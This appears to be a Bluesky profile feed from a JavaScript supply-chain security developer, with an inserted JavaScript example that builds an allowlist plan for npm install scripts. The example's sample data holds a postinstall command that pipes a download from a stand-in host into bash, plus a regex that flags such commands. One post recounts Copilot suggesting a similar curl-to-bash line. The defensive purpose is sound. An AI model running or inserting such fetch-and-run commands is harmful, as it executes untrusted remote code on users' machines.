naugtur
@naugtur.pl
1.2K followers 240 following 2.3K posts
Working on supply chain security for JS. LavaMoat and Endo contributor. meet.js Poland organizer. Node.js user since v0.8. Addicted to teaching. https://naugtur.pl
naugtur.pl
naugtur @naugtur.pl · Jan 29
A Phish on a Fork, no Chips.

One more thing to beware in the world of software supply chain risks.

Read if you care about your GitHub actions or dependencies.

Or read it for the fish puns. 🫣

dev.to/naugtur/a-ph...
A Phish on a Fork, no Chips
So you were told that this is the safest way to install a package from github with npm: "test262":...
dev.to
Reposted by naugtur
automerge.org
🎮 Like CRDTs and videogames? @inkandswitch.com is ✨hiring✨ for a project that combines @automerge.org with @godotengine.org to make the next generation of collaboration tools for game development!

More detail here: inkandswitch.com/jobs/godot-i...

(Fully remote 🌍🌎🌏 contract, late Nov to April)
Godot IDE Engineer
Help build native, visual version control for collaborative game development in Godot
inkandswitch.com
naugtur.pl
Sounds exciting.

Yes, I do like them, while being bad at both 😅

My biggest achievement in CRDT was noticing that a bloom filter is a CRDT and failing to find a usecase for that little fact.
naugtur.pl
Whenever I say I've read some book and it's been an audiobook version I feel guilty if I don't do a disclaimer on that. I'd love for that feeling to go away.
naugtur.pl
I honestly regret not taking more of those stickers last time!
naugtur.pl
JSConf forever?
naugtur.pl
Pecunia something something
naugtur.pl
This is how you tell there's no longer a human consciousness in charge. Corporations reach a stage where decisions make themselves and are impenetrable to every individual involved.
naugtur.pl
Took the name from the example package, so no invention there.
Reposted by naugtur
kaseygifford.bsky.social
We should be asking this
c o n s t a n t l y.
naugtur.pl
@robertknight2.bsky.social You might find this amusing - I was working on an example malicious npm package and started typing curl in postinstall, which a copilot suggested following up with a shell script from a hallucinated repository under your github username and piping it to bash. 😅
naugtur.pl
I bet there are npm mirrors that could serve the same purpose but I never looked for one.
naugtur.pl
I tend to need it for exploration, not the whole thing, and they're often a single file change, so I go to the socket.dev file explorer and they always have a backup there. I download the individual file from raw view.
Reposted by naugtur
sydseter.com
The finding by Omer Mayraz regarding GitHub Copilot data exfiltration demonstrates why the AI revolution has shifted the balance of power from the cyber defender to the attacker. These systems have a stochastic nature, making attacking easier than defending. www.securityweek.com/github-copil...
GitHub Copilot Chat Flaw Leaked Data From Private Repositories
A vulnerability in the GitHub Copilot Chat AI assistant led to sensitive data leakage and full control over Copilot’s responses.
www.securityweek.com
naugtur.pl
The advice to disable all scripts without accompanying advice on how to safely execute the ones you actually need will make people reach for 'npm rebuild' and expose themselves again.

Should I PR a reference to www.npmjs.com/package/@lav... ?
www.npmjs.com
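As an added example of the policy that post argues for (my code, not LavaMoat's, npm's or any package's own; the package names, commands and allowlist shape are made up), here is the "disable everything, then run only what you reviewed" approach in JavaScript. With `ignore-scripts=true` in `.npmrc`, npm skips every preinstall/install/postinstall hook; instead of `npm rebuild`, which brings them all back, a small planner runs only the hooks that a committed allowlist approves and fails closed on anything unreviewed:

```javascript
// Added example, not LavaMoat's or npm's code. Plans which dependency
// lifecycle scripts to run after an install done with ignore-scripts=true,
// driven by an explicit allowlist rather than re-running all of them.

const LIFECYCLE_EVENTS = ['preinstall', 'install', 'postinstall'];

// Constructed sample of what node_modules/<pkg>/package.json would contain
// (hypothetical package names and commands, only here to exercise the planner).
const SAMPLE_PACKAGES = [
  { name: 'native-addon', version: '2.1.0', scripts: { install: 'node-gyp rebuild' } },
  { name: 'pure-js-lib', version: '1.3.0', scripts: { test: 'mocha' } },
  { name: 'sketchy-pkg', version: '0.0.9', scripts: { postinstall: 'curl -fsSL https://example.invalid/setup.sh | bash' } },
  { name: 'unreviewed-pkg', version: '4.0.0', scripts: { postinstall: 'node scripts/postinstall.js' } },
];

// Heuristic only: a lifecycle script that fetches something over the network
// and pipes it straight into a shell deserves a human look before it is allowed.
function looksLikeRemoteShell(command) {
  return /\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b/.test(command);
}

// Lifecycle commands a package declares, as [event, command] pairs, in the
// order npm would run them. Non-lifecycle scripts such as "test" are ignored.
function lifecycleScripts(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_EVENTS
    .filter((event) => typeof scripts[event] === 'string')
    .map((event) => [event, scripts[event]]);
}

// allowlist maps "name@version" or "name" to true (run) or false (never run).
// A version-pinned entry wins over a bare name, so a new release that changes
// its install script does not inherit the old approval. Packages with
// lifecycle scripts but no entry are reported as unreviewed and NOT run.
function planLifecycleScripts(packages, allowlist) {
  const plan = { run: [], denied: [], unreviewed: [], suspicious: [] };
  for (const pkg of packages) {
    const scripts = lifecycleScripts(pkg);
    if (scripts.length === 0) continue; // nothing to decide for this package
    for (const [event, command] of scripts) {
      if (looksLikeRemoteShell(command)) {
        plan.suspicious.push({ name: pkg.name, event, command });
      }
    }
    const decision = allowlist[`${pkg.name}@${pkg.version}`] ?? allowlist[pkg.name];
    if (decision === true) {
      for (const [event, command] of scripts) {
        plan.run.push({ name: pkg.name, event, command });
      }
    } else if (decision === false) {
      plan.denied.push(pkg.name);
    } else {
      plan.unreviewed.push(pkg.name);
    }
  }
  return plan;
}

// The allowlist you would commit next to package.json after reviewing each script.
const SAMPLE_ALLOWLIST = { 'native-addon': true, 'sketchy-pkg': false };

// Stand-alone run: show the plan for the constructed sample. "run" gets only
// native-addon's install hook; sketchy-pkg is denied (and flagged as
// suspicious); unreviewed-pkg is reported so a human has to decide.
const SAMPLE_PLAN = planLifecycleScripts(SAMPLE_PACKAGES, SAMPLE_ALLOWLIST);
console.log(JSON.stringify(SAMPLE_PLAN, null, 2));
```

The point of the `unreviewed` bucket is that the default is to do nothing and complain: a dependency that starts shipping a postinstall hook after an upgrade shows up in the report instead of silently running, which is exactly what a blanket `npm rebuild` would let through.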
naugtur.pl
The smell is part of the marketing. When enshittification hits the business you'll be smelling last week's passenger's supper. Hopefully unused.
naugtur.pl
Some people are left-handed, some are left-stomached 🤷‍♂️
naugtur.pl
In honor of spooky month, share a 4 word horror story that only someone in your profession would understand.

"Switch to <language> Selenium"
kriskowal.com
In honor of spooky month, share a 4 word horror story that only someone in your profession would understand.

"Off by one"
gretchenmcc.bsky.social
In honour of spooky month, share a 4 word horror story that only someone in your profession would understand.

"I'm correcting your grammar"
naugtur.pl
Reminds me of when I wanted gpt to give me a code sample illustrating an async trampoline in JS and the example was good enough for me to understand, but it didn't work and I had to fix it 😅
naugtur.pl
There was a time when electron apps and chrome were impacting each other's responsiveness on Linux somehow. No idea how that's possible.
naugtur.pl
Firefox on mobile can be configured to ask before handing over to the app and while it's a bit clunky, it gives you back control.
I mean on android, never had an iphone 🤷‍♂️
naugtur.pl
This dude in particular might have an overrepresentation of getting away with spewing nonsense in his daily life 😅